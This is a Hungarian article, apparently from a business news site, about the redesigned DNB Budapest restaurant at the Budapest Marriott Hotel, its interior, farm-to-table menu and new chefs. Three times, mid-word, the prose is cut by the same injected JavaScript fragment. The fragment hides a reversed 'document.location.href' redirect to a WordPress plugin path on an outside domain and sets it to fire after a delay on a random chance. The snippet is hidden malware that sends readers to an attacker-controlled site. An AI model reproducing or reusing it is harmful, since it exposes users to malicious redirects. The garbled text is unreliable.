A megújult étterem dizájn tekintetében a hotel belsőépítészetét követi, amelynek elemeit a Bauhaus stílus és kubista műalkotások ihlették, és amelyek a közösségi terek páratlan otthonosságát biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosítják. A kellemes atmoszféra kialakítása érdekében a tervezők antik sárgarezet, acélt, gránitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot, tölgyet, fehér Carrara márvány ötvözetet és bőrt is felhasználtak. A DNB legfőbb dizájneleme azonban az étterem nyújtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta páratlan dunai panoráma.A DNB Budapest a “farmtól az asztalig” koncepció jegyében helyi hozzávalókból készült, modern, magyaros ízeket kínál, és neves magyarországi borrégiók borait mutatja be. Az új koncepciót a Budapest Marriott Hotel csapatához 2019 év elején csatlakozó Varga Roland éttermi séf és Konstantinos Kranakis executive séf…
A cikk folytatódik: http://sikeresceg.co.hu/akiknek-sikerult/2019/05/25/friss-etterem-koncepcioval-es-ket-uj-seffel-erosit-a-budapest-marriott-hotel.html
- Hirdetés -